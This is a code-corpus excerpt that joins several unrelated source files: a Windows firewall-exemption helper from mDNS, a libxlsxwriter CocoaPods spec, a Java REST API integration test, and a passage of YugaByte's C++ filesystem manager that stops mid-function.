err = mDNSFirewallAppIsEnabled( fwProfile, fwProcessImageFileName, &fwAppEnabled );
require_noerr(err, exit);
// Only add the application if it isn't enabled
if (!fwAppEnabled)
{
// Get the list of authorized applications
err = fwProfile->get_AuthorizedApplications(&fwApps);
require(SUCCEEDED(err) && ( fwApps != NULL ), exit);
// Create an instance of an authorized application.
err = CoCreateInstance( __uuidof(NetFwAuthorizedApplication), NULL, CLSCTX_INPROC_SERVER, __uuidof(INetFwAuthorizedApplication), (void**)&fwApp );
require(SUCCEEDED(err) && ( fwApp != NULL ), exit);
fwBstrProcessImageFileName = SysAllocString(fwProcessImageFileName);
require_action(( fwProcessImageFileName != NULL ) && ( SysStringLen(fwBstrProcessImageFileName) > 0 ), exit, err = kNoMemoryErr);
// Set the executable file name
err = fwApp->put_ProcessImageFileName(fwBstrProcessImageFileName);
require(SUCCEEDED(err), exit);
fwBstrName = SysAllocString(fwName);
require_action( ( fwBstrName != NULL ) && ( SysStringLen(fwBstrName) > 0 ), exit, err = kNoMemoryErr);
// Set the friendly name
err = fwApp->put_Name(fwBstrName);
require(SUCCEEDED(err), exit);
// Now add the application
err = fwApps->Add(fwApp);
require(SUCCEEDED(err), exit);
}
err = kNoErr;
exit:
// Deallocate the BSTR objects
if ( fwBstrName != NULL )
{
SysFreeString(fwBstrName);
}
if ( fwBstrProcessImageFileName != NULL )
{
SysFreeString(fwBstrProcessImageFileName);
}
// Release the COM objects
if (fwApp != NULL)
{
fwApp->Release();
}
if (fwApps != NULL)
{
fwApps->Release();
}
return err;
}
static OSStatus
mDNSFirewallIsFileAndPrintSharingEnabled
(
IN INetFwProfile * fwProfile,
OUT BOOL * fwServiceEnabled
)
{
VARIANT_BOOL fwEnabled;
INetFwService* fwService = NULL;
INetFwServices* fwServices = NULL;
OSStatus err = S_OK;
_ASSERT(fwProfile != NULL);
_ASSERT(fwServiceEnabled != NULL);
*fwServiceEnabled = FALSE;
// Retrieve the globally open ports collection.
err = fwProfile->get_Services(&fwServices);
require( SUCCEEDED( err ), exit );
// Attempt to retrieve the globally open port.
err = fwServices->Item(NET_FW_SERVICE_FILE_AND_PRINT, &fwService);
require( SUCCEEDED( err ), exit );
// Find out if the globally open port is enabled.
err = fwService->get_Enabled(&fwEnabled);
require( SUCCEEDED( err ), exit );
if (fwEnabled != VARIANT_FALSE)
{
*fwServiceEnabled = TRUE;
}
exit:
// Release the globally open port.
if (fwService != NULL)
{
fwService->Release();
}
// Release the globally open ports collection.
if (fwServices != NULL)
{
fwServices->Release();
}
return err;
}
OSStatus
mDNSAddToFirewall
(
LPWSTR executable,
LPWSTR name
)
{
INetFwProfile * fwProfile = NULL;
HRESULT comInit = E_FAIL;
OSStatus err = kNoErr;
// Initialize COM.
comInit = CoInitializeEx( 0, COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE );
// Ignore this case. RPC_E_CHANGED_MODE means that COM has already been
// initialized with a different mode.
if (comInit != RPC_E_CHANGED_MODE)
{
err = comInit;
require(SUCCEEDED(err), exit);
}
// Connect to the firewall
err = mDNSFirewallInitialize(&fwProfile);
require( SUCCEEDED( err ) && ( fwProfile != NULL ), exit);
// Add us to the list of exempt programs
err = mDNSFirewallAddApp( fwProfile, executable, name );
require_noerr(err, exit);
exit:
// Disconnect from the firewall
if ( fwProfile != NULL )
{
mDNSFirewallCleanup(fwProfile);
}
// De-initialize COM
if (SUCCEEDED(comInit))
{
CoUninitialize();
}
return err;
}
BOOL
mDNSIsFileAndPrintSharingEnabled( BOOL * retry )
{
INetFwProfile * fwProfile = NULL;
HRESULT comInit = E_FAIL;
BOOL enabled = FALSE;
OSStatus err = kNoErr;
// Initialize COM.
*retry = FALSE;
comInit = CoInitializeEx( 0, COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE );
// Ignore this case. RPC_E_CHANGED_MODE means that COM has already been
// initialized with a different mode.
if (comInit != RPC_E_CHANGED_MODE)
{
*retry = TRUE;
err = comInit;
require(SUCCEEDED(err), exit);
}
// Connect to the firewall
err = mDNSFirewallInitialize(&fwProfile);
require( SUCCEEDED( err ) && ( fwProfile != NULL ), exit);
err = mDNSFirewallIsFileAndPrintSharingEnabled( fwProfile, &enabled );
require_noerr( err, exit );
exit:
// Disconnect from the firewall
if ( fwProfile != NULL )
{
mDNSFirewallCleanup(fwProfile);
}
// De-initialize COM
if (SUCCEEDED(comInit))
{
CoUninitialize();
}
return enabled;
}
| 3,794 |
5,169 | <reponame>Gantios/Specs
{
"name": "libxlsxwriter",
"version": "0.7.8",
"summary": "Libxlsxwriter: A C library for creating Excel XLSX files.",
"platforms": {
"ios": "6.0",
"osx": "10.8"
},
"description": "Libxlsxwriter is a C library that can be used to write text, numbers, formulas and hyperlinks to multiple worksheets in an Excel 2007+ XLSX file.\n\nIt supports features such as:\n\n* 100% compatible Excel XLSX files.\n* Full Excel formatting.\n* Merged cells.\n* Defined names.\n* Autofilters.\n* Charts.\n* Data validation and drop down lists.\n* Worksheet PNG/JPEG images.\n* Memory optimisation mode for writing large files.\n* Source code available on [GitHub](https://github.com/jmcnamara/libxlsxwriter).\n* FreeBSD license.\n* ANSI C.\n* Works with GCC, Clang, Xcode, MSVC 2015, ICC, TCC, MinGW, MingGW-w64/32.\n* Works on Linux, FreeBSD, OpenBSD, OS X, iOS and Windows. Also works on MSYS/MSYS2 and Cygwin.\n* Compiles for 32 and 64 bit.\n* Compiles and works on big and little endian systems.\n* The only dependency is on `zlib`.",
"homepage": "http://libxlsxwriter.github.io",
"documentation_url": "http://libxlsxwriter.github.io",
"license": "FreeBSD",
"authors": {
"<NAME>": "<EMAIL>"
},
"source": {
"git": "https://github.com/jmcnamara/libxlsxwriter.git",
"tag": "RELEASE_0.7.8"
},
"source_files": [
"src/**/*.c",
"third_party/**/{zip.c,ioapi.c,tmpfileplus.c}",
"include/**/*.h"
],
"header_dir": "xlsxwriter",
"header_mappings_dir": "include",
"libraries": "z",
"compiler_flags": [
"-DNOCRYPT=1",
"-DNOUNCRYPT=1"
],
"pod_target_xcconfig": {
"USER_HEADER_SEARCH_PATHS": "${PODS_ROOT}/libxlsxwriter/include"
},
"module_map": "cocoapods/libxlsxwriter.modulemap",
"prepare_command": "cp cocoapods/libxlsxwriter-umbrella.h include/xlsxwriter/libxlsxwriter-umbrella.h"
}
| 751 |
1,974 | package com.artemzin.qualitymatters.integration_tests.api;
import com.artemzin.qualitymatters.QualityMattersIntegrationRobolectricTestRunner;
import com.artemzin.qualitymatters.api.QualityMattersRestApi;
import com.artemzin.qualitymatters.api.entities.Item;
import org.junit.After;
import org.junit.Before;
import org.junit.Test;
import org.junit.runner.RunWith;
import java.io.IOException;
import java.util.List;
import okhttp3.mockwebserver.MockResponse;
import okhttp3.mockwebserver.MockWebServer;
import retrofit2.adapter.rxjava.HttpException;
import static org.assertj.core.api.Assertions.assertThat;
import static org.assertj.core.api.Assertions.fail;
/**
* Main purpose of Integration tests is to check that all layers of your app work correctly, for example:
* <ul>
* <li>Http layer</li>
* <li>REST layer</li>
* <li>Parsing/Serializing layer</li>
* <li>Execution layer (ie RxJava)</li>
* </ul>
*/
@RunWith(QualityMattersIntegrationRobolectricTestRunner.class)
public class QualityMattersRestApiIntegrationTest {
private MockWebServer mockWebServer;
private QualityMattersRestApi qualityMattersRestApi;
@Before
public void beforeEachTest() throws IOException {
mockWebServer = new MockWebServer();
mockWebServer.start();
// Change base url to the mocked
QualityMattersIntegrationRobolectricTestRunner.qualityMattersApp().applicationComponent().changeableBaseUrl().setBaseUrl(mockWebServer.url("").toString());
qualityMattersRestApi = QualityMattersIntegrationRobolectricTestRunner.qualityMattersApp().applicationComponent().qualityMattersApi();
}
@After
public void afterEachTest() throws IOException {
mockWebServer.shutdown();
}
@Test
public void items_shouldHandleCorrectResponse() {
mockWebServer.enqueue(new MockResponse().setBody("["
+ "{ \"id\": \"test_id_1\", \"image_preview_url\": \"https://url1\", \"title\": \"Test title 1\", \"short_description\": \"Short desc 1\"},"
+ "{ \"id\": \"test_id_2\", \"image_preview_url\": \"https://url2\", \"title\": \"Test title 2\", \"short_description\": \"Short desc 2\"},"
+ "{ \"id\": \"test_id_3\", \"image_preview_url\": \"https://url3\", \"title\": \"Test title 3\", \"short_description\": \"Short desc 3\"}"
+ "]"));
// Get items from the API
List<Item> items = qualityMattersRestApi.items().toBlocking().value();
assertThat(items).hasSize(3);
assertThat(items.get(0).id()).isEqualTo("test_id_1");
assertThat(items.get(0).imagePreviewUrl()).isEqualTo("https://url1");
assertThat(items.get(0).title()).isEqualTo("Test title 1");
assertThat(items.get(0).shortDescription()).isEqualTo("Short desc 1");
assertThat(items.get(1).id()).isEqualTo("test_id_2");
assertThat(items.get(1).imagePreviewUrl()).isEqualTo("https://url2");
assertThat(items.get(1).title()).isEqualTo("Test title 2");
assertThat(items.get(1).shortDescription()).isEqualTo("Short desc 2");
assertThat(items.get(2).id()).isEqualTo("test_id_3");
assertThat(items.get(2).imagePreviewUrl()).isEqualTo("https://url3");
assertThat(items.get(2).title()).isEqualTo("Test title 3");
assertThat(items.get(2).shortDescription()).isEqualTo("Short desc 3");
}
// Such tests assert that no matter how we implement our REST api:
// Retrofit or not
// OkHttp or not
// It should handle error responses too.
@Test
public void items_shouldThrowExceptionIfWebServerRespondError() {
for (Integer errorCode : HttpCodes.clientAndServerSideErrorCodes()) {
mockWebServer.enqueue(new MockResponse().setStatus("HTTP/1.1 " + errorCode + " Not today"));
try {
qualityMattersRestApi.items().toBlocking().value();
fail("HttpException should be thrown for error code: " + errorCode);
} catch (RuntimeException expected) {
HttpException httpException = (HttpException) expected.getCause();
assertThat(httpException.code()).isEqualTo(errorCode);
assertThat(httpException.message()).isEqualTo("Not today");
}
}
}
}
| 1,623 |
2,759 | // Licensed to the Apache Software Foundation (ASF) under one
// or more contributor license agreements. See the NOTICE file
// distributed with this work for additional information
// regarding copyright ownership. The ASF licenses this file
// to you under the Apache License, Version 2.0 (the
// "License"); you may not use this file except in compliance
// with the License. You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing,
// software distributed under the License is distributed on an
// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
// KIND, either express or implied. See the License for the
// specific language governing permissions and limitations
// under the License.
//
// The following only applies to changes made to this file as part of YugaByte development.
//
// Portions Copyright (c) YugaByte, Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
// in compliance with the License. You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software distributed under the License
// is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
// or implied. See the License for the specific language governing permissions and limitations
// under the License.
//
#include "yb/fs/fs_manager.h"
#include <map>
#include <set>
#include <unordered_set>
#include <boost/algorithm/string/predicate.hpp>
#include <boost/preprocessor/cat.hpp>
#include <glog/logging.h>
#include <glog/stl_logging.h>
#include <google/protobuf/message.h>
#include "yb/fs/fs.pb.h"
#include "yb/gutil/map-util.h"
#include "yb/gutil/strings/join.h"
#include "yb/gutil/strings/numbers.h"
#include "yb/gutil/strings/split.h"
#include "yb/gutil/strings/strip.h"
#include "yb/gutil/strings/util.h"
#include "yb/gutil/walltime.h"
#include "yb/util/debug-util.h"
#include "yb/util/env_util.h"
#include "yb/util/flag_tags.h"
#include "yb/util/format.h"
#include "yb/util/metric_entity.h"
#include "yb/util/net/net_util.h"
#include "yb/util/oid_generator.h"
#include "yb/util/path_util.h"
#include "yb/util/pb_util.h"
#include "yb/util/result.h"
DEFINE_bool(enable_data_block_fsync, true,
"Whether to enable fsync() of data blocks, metadata, and their parent directories. "
"Disabling this flag may cause data loss in the event of a system crash.");
TAG_FLAG(enable_data_block_fsync, unsafe);
DECLARE_string(fs_data_dirs);
DEFINE_string(fs_wal_dirs, "",
"Comma-separated list of directories for write-ahead logs. This is an optional "
"argument. If this is not specified, fs_data_dirs is used for write-ahead logs "
"also and that's a reasonable default for most use cases.");
TAG_FLAG(fs_wal_dirs, stable);
DEFINE_string(instance_uuid_override, "",
"When creating local instance metadata (for master or tserver) in an empty data "
"directory, use this UUID instead of randomly-generated one. Can be used to replace "
"a node that had its disk wiped in some scenarios.");
DEFINE_test_flag(bool, simulate_fs_create_failure, false,
"Simulate failure during initial creation of fs during the first time "
"process creation.");
METRIC_DEFINE_entity(drive);
METRIC_DEFINE_counter(drive, drive_fault,
"Drive Fault. Tablet Server isn't able to read/write on this drive.",
yb::MetricUnit::kUnits,
"Drive Fault. Tablet Server isn't able to read/write on this drive.");
using google::protobuf::Message;
using yb::env_util::ScopedFileDeleter;
using std::map;
using std::unordered_set;
using strings::Substitute;
namespace yb {
// ==========================================================================
// FS Paths
// ==========================================================================
const char *FsManager::kWalDirName = "wals";
const char *FsManager::kWalFileNamePrefix = "wal";
const char *FsManager::kWalsRecoveryDirSuffix = ".recovery";
const char *FsManager::kRocksDBDirName = "rocksdb";
const char *FsManager::kDataDirName = "data";
namespace {
const char kRaftGroupMetadataDirName[] = "tablet-meta";
const char kInstanceMetadataFileName[] = "instance";
const char kFsLockFileName[] = "fs-lock";
const char kConsensusMetadataDirName[] = "consensus-meta";
const char kLogsDirName[] = "logs";
const char kTmpInfix[] = ".tmp";
const char kCheckFileTemplate[] = "check.XXXXXX";
const char kSecureCertsDirName[] = "certs";
const char kPrefixMetricId[] = "drive:";
std::string DataDir(const std::string& root, const std::string& server_type) {
return JoinPathSegments(GetServerTypeDataPath(root, server_type), FsManager::kDataDirName);
}
std::string WalDir(const std::string& root, const std::string& server_type) {
return JoinPathSegments(GetServerTypeDataPath(root, server_type), FsManager::kWalDirName);
}
} // namespace
FsManagerOpts::FsManagerOpts()
: read_only(false) {
if (FLAGS_fs_wal_dirs.empty() && !FLAGS_fs_data_dirs.empty()) {
// It is sufficient if user sets the data dirs. By default we use the same
// directories for WALs as well.
FLAGS_fs_wal_dirs = FLAGS_fs_data_dirs;
}
wal_paths = strings::Split(FLAGS_fs_wal_dirs, ",", strings::SkipEmpty());
data_paths = strings::Split(FLAGS_fs_data_dirs, ",", strings::SkipEmpty());
}
FsManagerOpts::~FsManagerOpts() = default;
FsManagerOpts::FsManagerOpts(const FsManagerOpts&) = default;
FsManagerOpts& FsManagerOpts::operator=(const FsManagerOpts&) = default;
FsManager::FsManager(Env* env, const string& root_path, const std::string& server_type)
: env_(DCHECK_NOTNULL(env)),
read_only_(false),
wal_fs_roots_({ root_path }),
data_fs_roots_({ root_path }),
server_type_(server_type),
metric_registry_(nullptr),
initted_(false) {
}
FsManager::FsManager(Env* env,
const FsManagerOpts& opts)
: env_(DCHECK_NOTNULL(env)),
read_only_(opts.read_only),
wal_fs_roots_(opts.wal_paths),
data_fs_roots_(opts.data_paths),
server_type_(opts.server_type),
metric_registry_(opts.metric_registry),
parent_mem_tracker_(opts.parent_mem_tracker),
initted_(false) {
}
FsManager::~FsManager() {
}
Status FsManager::Init() {
if (initted_) {
return Status::OK();
}
// The wal root must be set.
if (data_fs_roots_.empty()) {
return STATUS(IOError, "List of data directories (fs_data_dirs) not provided");
}
// Deduplicate all of the roots.
set<string> all_roots;
for (const string& wal_fs_root : wal_fs_roots_) {
all_roots.insert(wal_fs_root);
}
for (const string& data_fs_root : data_fs_roots_) {
all_roots.insert(data_fs_root);
}
// Build a map of original root --> canonicalized root, sanitizing each
// root a bit as we go.
typedef map<string, string> RootMap;
RootMap canonicalized_roots;
for (const string& root : all_roots) {
if (root.empty()) {
return STATUS(IOError, "Empty string provided for filesystem root");
}
if (root[0] != '/') {
return STATUS(IOError,
Substitute("Relative path $0 provided for filesystem root", root));
}
{
string root_copy = root;
StripWhiteSpace(&root_copy);
if (root != root_copy) {
return STATUS(IOError,
Substitute("Filesystem root $0 contains illegal whitespace", root));
}
}
// Strip the basename when canonicalizing, as it may not exist. The
// dirname, however, must exist.
string canonicalized;
Status s = env_->Canonicalize(DirName(root), &canonicalized);
if (!s.ok()) {
return STATUS(
InvalidArgument, strings::Substitute(
"Cannot create directory for YB data, please check the --fs_data_dirs parameter "
"(Passed: $0). Path does not exist: $1\nDetails: $2",
FLAGS_fs_data_dirs, root, s.ToString()));
}
canonicalized = JoinPathSegments(canonicalized, BaseName(root));
InsertOrDie(&canonicalized_roots, root, canonicalized);
}
// All done, use the map to set the canonicalized state.
for (const auto& wal_fs_root : wal_fs_roots_) {
canonicalized_wal_fs_roots_.insert(FindOrDie(canonicalized_roots, wal_fs_root));
}
if (!data_fs_roots_.empty()) {
canonicalized_default_fs_root_ = FindOrDie(canonicalized_roots, data_fs_roots_[0]);
for (const string& data_fs_root : data_fs_roots_) {
canonicalized_data_fs_roots_.insert(FindOrDie(canonicalized_roots, data_fs_root));
}
} else {
LOG(FATAL) << "Data directories (fs_data_dirs) must be specified";
}
for (const RootMap::value_type& e : canonicalized_roots) {
canonicalized_all_fs_roots_.insert(e.second);
}
if (VLOG_IS_ON(1)) {
VLOG(1) << "WAL roots: " << canonicalized_wal_fs_roots_;
VLOG(1) << "Metadata root: " << canonicalized_default_fs_root_;
VLOG(1) << "Data roots: " << canonicalized_data_fs_roots_;
VLOG(1) << "All roots: " << canonicalized_all_fs_roots_;
}
initted_ = true;
return Status::OK();
}
Status FsManager::CheckAndOpenFileSystemRoots() {
RETURN_NOT_OK(Init());
if (HasAnyLockFiles()) {
return STATUS(Corruption, "Lock file is present, filesystem may be in inconsistent state");
}
bool create_roots = false;
for (const string& root : canonicalized_all_fs_roots_) {
auto pb = std::make_unique<InstanceMetadataPB>();
auto read_result = pb_util::ReadPBContainerFromPath(env_, GetInstanceMetadataPath(root),
pb.get());
auto write_result = CheckWrite(root);
if ((!read_result.ok() && !read_result.IsNotFound()) || !write_result.ok()) {
LOG(WARNING) << "Path: " << root << " Read Result: "<< read_result
<< " Write Result: " << write_result;
canonicalized_wal_fs_roots_.erase(root);
canonicalized_data_fs_roots_.erase(root);
CreateAndSetFaultDriveMetric(root);
continue;
}
if (read_result.IsNotFound()) {
create_roots = true;
continue;
}
if (!metadata_) {
metadata_.reset(pb.release());
} else if (pb->uuid() != metadata_->uuid()) {
return STATUS(Corruption, Substitute(
"Mismatched UUIDs across filesystem roots: $0 vs. $1",
metadata_->uuid(), pb->uuid()));
}
}
if (!metadata_) {
return STATUS(NotFound, "Metadata wasn't found");
}
if (create_roots) {
RETURN_NOT_OK(CreateFileSystemRoots(*metadata_.get()));
}
for (const auto& dir : GetAncillaryDirs()) {
bool created;
RETURN_NOT_OK(CreateDirIfMissingAndSync(dir, &created));
if (created) {
LOG(INFO) << dir << " was created";
}
}
LOG(INFO) << "Opened local filesystem: " << JoinStrings(canonicalized_all_fs_roots_, ",")
<< std::endl << metadata_->DebugString();
return Status::OK();
}
bool FsManager::HasAnyLockFiles() {
for (const string& root : canonicalized_all_fs_roots_) {
if (Exists(GetFsLockFilePath(root))) {
LOG(INFO) << "Found lock file in dir " << root;
return true;
}
}
return false;
}
Status FsManager::DeleteLockFiles() {
CHECK(!read_only_);
vector<string> removal_list;
for (const string& root : canonicalized_all_fs_roots_) {
std::string lock_file_path = GetFsLockFilePath(root);
if (Exists(lock_file_path)) {
removal_list.push_back(lock_file_path);
}
}
for (const string& target : removal_list) {
RETURN_NOT_OK_PREPEND(env_->DeleteFile(target), "Lock file delete failed");
}
return Status::OK();
}
Status FsManager::DeleteFileSystemLayout(ShouldDeleteLogs also_delete_logs) {
CHECK(!read_only_);
set<string> removal_set;
if (also_delete_logs) {
removal_set = canonicalized_all_fs_roots_;
} else {
auto removal_list = GetWalRootDirs();
AppendValues(GetRaftGroupMetadataDirs(), &removal_list);
AppendValues(GetConsensusMetadataDirs(), &removal_list);
for (const string& root : canonicalized_all_fs_roots_) {
removal_list.push_back(GetInstanceMetadataPath(root));
}
auto data_dirs = GetDataRootDirs();
removal_list.insert(removal_list.begin(), data_dirs.begin(), data_dirs.end());
removal_set.insert(removal_list.begin(), removal_list.end());
}
for (const string& target : removal_set) {
bool is_dir = false;
Status s = env_->IsDirectory(target, &is_dir);
if (!s.ok()) {
LOG(WARNING) << "Error: " << s.ToString() << " when checking if " << target
<< " is a directory.";
continue;
}
if (is_dir) {
RETURN_NOT_OK(env_->DeleteRecursively(target));
} else {
RETURN_NOT_OK(env_->DeleteFile(target));
}
}
RETURN_NOT_OK(DeleteLockFiles());
return Status::OK();
}
Status FsManager::CreateInitialFileSystemLayout(bool delete_fs_if_lock_found) {
CHECK(!read_only_);
RETURN_NOT_OK(Init());
bool fs_cleaned = false;
// If lock file is present, delete existing filesystem layout before continuing.
if (delete_fs_if_lock_found && HasAnyLockFiles()) {
RETURN_NOT_OK(DeleteFileSystemLayout());
fs_cleaned = true;
}
// It's OK if a root already exists as long as there's nothing in it.
for (const string& root : canonicalized_all_fs_roots_) {
if (!env_->FileExists(GetServerTypeDataPath(root, server_type_))) {
// We'll create the directory below.
continue;
}
bool is_empty;
RETURN_NOT_OK_PREPEND(IsDirectoryEmpty(GetServerTypeDataPath(root, server_type_), &is_empty),
"Unable to check if FSManager root is empty");
if (!is_empty) {
return STATUS(AlreadyPresent, "FSManager root is not empty", root);
}
}
// All roots are either empty or non-existent. Create missing roots and all
// subdirectories.
//
InstanceMetadataPB metadata;
CreateInstanceMetadata(&metadata);
RETURN_NOT_OK(CreateFileSystemRoots(metadata,
/* create_lock = */ fs_cleaned));
if (FLAGS_TEST_simulate_fs_create_failure) {
return STATUS(IOError, "Simulated fs creation error");
}
RETURN_NOT_OK(DeleteLockFiles());
return Status::OK();
}
Status FsManager::CreateFileSystemRoots(const InstanceMetadataPB& metadata,
bool create_lock) {
// In the event of failure, delete everything we created.
std::deque<ScopedFileDeleter> delete_on_failure;
unordered_set<string> to_sync;
std::set<std::string> roots = canonicalized_data_fs_roots_;
roots.insert(canonicalized_wal_fs_roots_.begin(), canonicalized_wal_fs_roots_.end());
// All roots are either empty or non-existent. Create missing roots and all
// subdirectories.
for (const auto& root : roots) {
bool created;
std::string out_dir;
RETURN_NOT_OK(SetupRootDir(env_, root, server_type_, &out_dir, &created));
if (created) {
delete_on_failure.emplace_front(env_, out_dir);
to_sync.insert(DirName(out_dir));
}
const string lock_file_path = GetFsLockFilePath(root);
if (create_lock && !Exists(lock_file_path)) {
std::unique_ptr<WritableFile> file;
RETURN_NOT_OK_PREPEND(env_->NewWritableFile(lock_file_path, &file),
"Unable to create lock file.");
// Do not delete lock file on error. It is used to detect failed initial create.
}
const string instance_metadata_path = GetInstanceMetadataPath(root);
if (env_->FileExists(instance_metadata_path)) {
continue;
}
RETURN_NOT_OK_PREPEND(WriteInstanceMetadata(metadata, instance_metadata_path),
"Unable to write instance metadata");
delete_on_failure.emplace_front(env_, instance_metadata_path);
}
for (const auto& dir : GetAncillaryDirs()) {
bool created;
RETURN_NOT_OK_PREPEND(CreateDirIfMissing(dir, &created),
Substitute("Unable to create directory $0", dir));
if (created) {
delete_on_failure.emplace_front(env_, dir);
to_sync.insert(DirName(dir));
}
}
// Ensure newly created directories are synchronized to disk.
if (FLAGS_enable_data_block_fsync) {
for (const string& dir : to_sync) {
RETURN_NOT_OK_PREPEND(env_->SyncDir(dir),
Substitute("Unable to synchronize directory $0", dir));
}
}
// Success: don't delete any files.
for (auto& deleter : delete_on_failure) {
deleter.Cancel();
}
return Status::OK();
}
std::set<std::string> FsManager::GetAncillaryDirs() const {
std::set<std::string> ancillary_dirs;
AppendValues(GetRaftGroupMetadataDirs(), &ancillary_dirs);
AppendValues(GetConsensusMetadataDirs(), &ancillary_dirs);
for (const auto& wal_fs_root : canonicalized_wal_fs_roots_) {
ancillary_dirs.emplace(WalDir(wal_fs_root, server_type_));
}
for (const string& data_fs_root : canonicalized_data_fs_roots_) {
const string data_dir = DataDir(data_fs_root, server_type_);
ancillary_dirs.emplace(data_dir);
ancillary_dirs.emplace(JoinPathSegments(data_dir, kRocksDBDirName));
}
return ancillary_dirs;
}
void FsManager::CreateInstanceMetadata(InstanceMetadataPB* metadata) {
if (!FLAGS_instance_uuid_override.empty()) {
metadata->set_uuid(FLAGS_instance_uuid_override);
} else {
metadata->set_uuid(GenerateObjectId());
}
string time_str;
StringAppendStrftime(&time_str, "%Y-%m-%d %H:%M:%S", time(nullptr), false);
string hostname;
if (!GetHostname(&hostname).ok()) {
hostname = "<unknown host>";
}
metadata->set_format_stamp(Substitute("Formatted at $0 on $1", time_str, hostname));
}
Status FsManager::WriteInstanceMetadata(const InstanceMetadataPB& metadata,
const string& path) {
// The instance metadata is written effectively once per TS, so the
// durability cost is negligible.
RETURN_NOT_OK(pb_util::WritePBContainerToPath(env_, path,
metadata,
pb_util::NO_OVERWRITE,
pb_util::SYNC));
LOG(INFO) << "Generated new instance metadata in path " << path << ":\n"
<< metadata.DebugString();
return Status::OK();
}
Status FsManager::IsDirectoryEmpty(const string& path, bool* is_empty) {
vector<string> children;
RETURN_NOT_OK(env_->GetChildren(path, &children));
for (const string& child : children) {
// Excluding logs directory from the list of things to check for.
if (child == "." || child == ".." || child == kLogsDirName) {
continue;
} else {
LOG(INFO) << "Found data " << child;
*is_empty = false;
return Status::OK();
}
}
*is_empty = true;
return Status::OK();
}
Status FsManager::CheckWrite(const std::string& root) {
RETURN_NOT_OK(env_->CreateDirs(root));
const string tmp_file_temp = JoinPathSegments(root, kCheckFileTemplate);
string tmp_file;
std::unique_ptr<WritableFile> file;
Status write_result = env_->NewTempWritableFile(WritableFileOptions(),
tmp_file_temp,
&tmp_file,
&file);
if (!write_result.ok()) {
return write_result;
}
ScopedFileDeleter deleter(env_, tmp_file);
write_result = file->Append(Slice("0123456789"));
if (!write_result.ok()) {
return write_result;
}
write_result = file->Close();
if (!write_result.ok()) {
return write_result;
}
return Status::OK();
}
void FsManager::CreateAndSetFaultDriveMetric(const std::string& path) {
MetricEntity::AttributeMap attrs;
attrs["drive_path"] = path;
auto metric_entity = METRIC_ENTITY_drive.Instantiate(metric_registry_,
kPrefixMetricId + path,
attrs);
METRIC_drive_fault.Instantiate(metric_entity)->Increment();
}
Status FsManager::CreateDirIfMissing(const string& path, bool* created) {
return env_util::CreateDirIfMissing(env_, path, created);
}
Status FsManager::CreateDirIfMissingAndSync(const std::string& path, bool* created) {
RETURN_NOT_OK_PREPEND(CreateDirIfMissing(path, created),
Substitute("Failed to create directory $0", path));
RETURN_NOT_OK_PREPEND(env_->SyncDir(DirName(path)),
Substitute("Failed to sync root directory $0", DirName(path)));
return Status::OK();
}
const string& FsManager::uuid() const {
return CHECK_NOTNULL(metadata_.get())->uuid();
}
set<string> FsManager::GetFsRootDirs() const {
return canonicalized_all_fs_roots_;
}
vector<string> FsManager::GetDataRootDirs() const {
// Add the data subdirectory to each data root.
vector<string> data_paths;
for (const string& data_fs_root : canonicalized_data_fs_roots_) {
data_paths.push_back(DataDir(data_fs_root, server_type_));
}
return data_paths;
}
vector<string> FsManager::GetWalRootDirs() const {
DCHECK(initted_);
vector<string> wal_dirs;
for (const auto& canonicalized_wal_fs_root : canonicalized_wal_fs_roots_) {
wal_dirs.push_back(WalDir(canonicalized_wal_fs_root, server_type_));
}
return wal_dirs;
}
std::string FsManager::GetRaftGroupMetadataDir(const std::string& data_dir) {
return JoinPathSegments(data_dir, kRaftGroupMetadataDirName);
}
vector<string> FsManager::GetRaftGroupMetadataDirs() const {
DCHECK(initted_);
vector<string> data_paths;
data_paths.reserve(canonicalized_data_fs_roots_.size());
for (const string& data_fs_root : canonicalized_data_fs_roots_) {
data_paths.push_back(GetRaftGroupMetadataDir(
GetServerTypeDataPath(data_fs_root, server_type_)));
}
return data_paths;
}
Result<std::string> FsManager::GetRaftGroupMetadataPath(const string& tablet_id) const {
return JoinPathSegments(GetRaftGroupMetadataDir(VERIFY_RESULT(GetTabletPath(tablet_id))),
tablet_id);
}
void FsManager::SetTabletPathByDataPath(const string& tablet_id, const string& path) {
string tablet_path = path.empty() ? GetDefaultRootDir() : DirName(path);
std::lock_guard<std::mutex> lock(data_mutex_);
InsertOrUpdate(&tablet_id_to_path_, tablet_id, tablet_path);
}
Result<std::string> FsManager::GetTabletPath(const std::string &tablet_id) const {
std::lock_guard<std::mutex> lock(data_mutex_);
auto tabet_path_it = tablet_id_to_path_.find(tablet_id);
if (tabet_path_it == tablet_id_to_path_.end()) {
return STATUS(NotFound, Format("Metadata dir not found for tablet $0", tablet_id));
}
return tabet_path_it->second;
}
bool FsManager::LookupTablet(const std::string &tablet_id) {
for (const auto& dir : GetRaftGroupMetadataDirs()) {
if (env_->FileExists(JoinPathSegments(dir, tablet_id))) {
std::lock_guard<std::mutex> lock(data_mutex_);
tablet_id_to_path_.insert({tablet_id, DirName(dir)});
return true;
}
}
return false;
}
namespace {
// Return true if 'fname' is a valid tablet ID.
bool IsValidTabletId(const std::string& fname) {
if (fname.find(kTmpInfix) != string::npos) {
LOG(WARNING) << "Ignoring tmp file in tablet metadata dir: " << fname;
return false;
}
if (HasPrefixString(fname, ".")) {
// Hidden file or ./..
VLOG(1) << "Ignoring hidden file in tablet metadata dir: " << fname;
return false;
}
return true;
}
} // anonymous namespace
Result<std::vector<std::string>> FsManager::ListTabletIds() {
std::lock_guard<std::mutex> lock(data_mutex_);
std::vector<std::string> tablet_ids;
for (const auto& dir : GetRaftGroupMetadataDirs()) {
vector<string> children;
RETURN_NOT_OK_PREPEND(ListDir(dir, &children),
Substitute("Couldn't list tablets in metadata directory $0", dir));
for (const string& child : children) {
if (!IsValidTabletId(child)) {
continue;
}
tablet_id_to_path_.emplace(child, DirName(dir));
tablet_ids.push_back(child);
}
}
return tablet_ids;
}
std::string FsManager::GetInstanceMetadataPath(const string& root) const {
